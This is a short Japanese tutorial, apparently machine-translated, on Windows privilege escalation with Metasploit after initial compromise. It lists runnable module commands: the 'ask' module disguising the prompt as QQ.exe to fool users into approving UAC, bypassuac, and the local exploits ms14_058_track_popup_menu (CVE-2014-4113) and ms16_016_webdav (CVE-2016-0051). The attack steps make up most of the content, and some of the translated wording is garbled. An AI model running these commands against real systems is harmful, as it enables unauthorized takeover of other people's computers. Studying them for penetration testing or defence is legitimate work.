UACクリックして権利を引き上げる
- getuidコマンドを使用すると、通常のユーザーであることが判明し、システム権限を取得しようとして失敗しました
- ここでは、別のmsfエクスプロイトモジュールを使用します
background
back
use exploit/windows/local/ask
info
show options
set session 3
set filename QQ.exe
run
- 注:ここで、セッションのIDは権限の低いアカウントのID番号であることを説明します。
- 右のエスカレーションが成功したら、getsystemコマンドを使用して右のエスカレーションを正常にエスカレーションします
- この方法では、ユーザーはUACダイアログボックスで[はい]をクリックする必要があります。コンピューターのセキュリティについて少し知識がある人は、この操作が非常に疑わしいと感じるでしょう。この方法は、セキュリティ意識が弱いユーザーのみを対象としています。したがって、UACをバイパスする直接の言及は次のようになります。以下に紹介します。右
UACは特権昇格をバイパスします
- msfのbypassuacモジュールを使用して、uac認証をバイパスします
use exploit/windows/local/bypassuac
set session 5
exploit
直接の特権昇格は、ユーザーの操作なしで成功します
特権昇格の抜け穴を使用して特権を昇格する
- CVE-2014-4113の脆弱性である特権昇格にWindowsシステムの脆弱性ms14_058_track_popup_menuを使用する
back
use exploit/windows/local/ms14_058_track_popup_menu
exploit
- 攻撃が完了すると、アクセス許可がすでにシステムアクセス許可になっていることがわかります
- 実際、Windows7で悪用される可能性のある脆弱性は非常に多く、CVE-2016-0051の脆弱性であるms16_016_webdavもあります。
use exploit/windows/local/ms16_016_webdav
set session 4
exploit